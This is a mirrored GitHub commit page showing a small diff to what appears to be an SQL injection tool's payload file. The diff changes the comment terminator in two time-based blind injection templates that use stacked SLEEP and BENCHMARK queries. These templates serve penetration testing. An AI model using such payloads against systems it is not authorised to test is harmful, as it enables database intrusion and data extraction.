Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 84479ee

Browse files
committed
minor fix
1 parent 890bf70 commit 84479ee

1 file changed

Lines changed: 2 additions & 2 deletions

File tree

xml/payloads.xml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1834,7 +1834,7 @@ Formats:
18341834
<vector>; IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]);</vector>
18351835
<request>
18361836
<payload>; SELECT SLEEP([SLEEPTIME]);</payload>
1837-
<comment>--</comment>
1837+
<comment>-- </comment>
18381838
</request>
18391839
<response>
18401840
<time>[SLEEPTIME]</time>
@@ -1855,7 +1855,7 @@ Formats:
18551855
<vector>; IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM]);</vector>
18561856
<request>
18571857
<payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'));</payload>
1858-
<comment>--</comment>
1858+
<comment>-- </comment>
18591859
</request>
18601860
<response>
18611861
<time>[DELAYED]</time>

0 commit comments

Comments
 (0)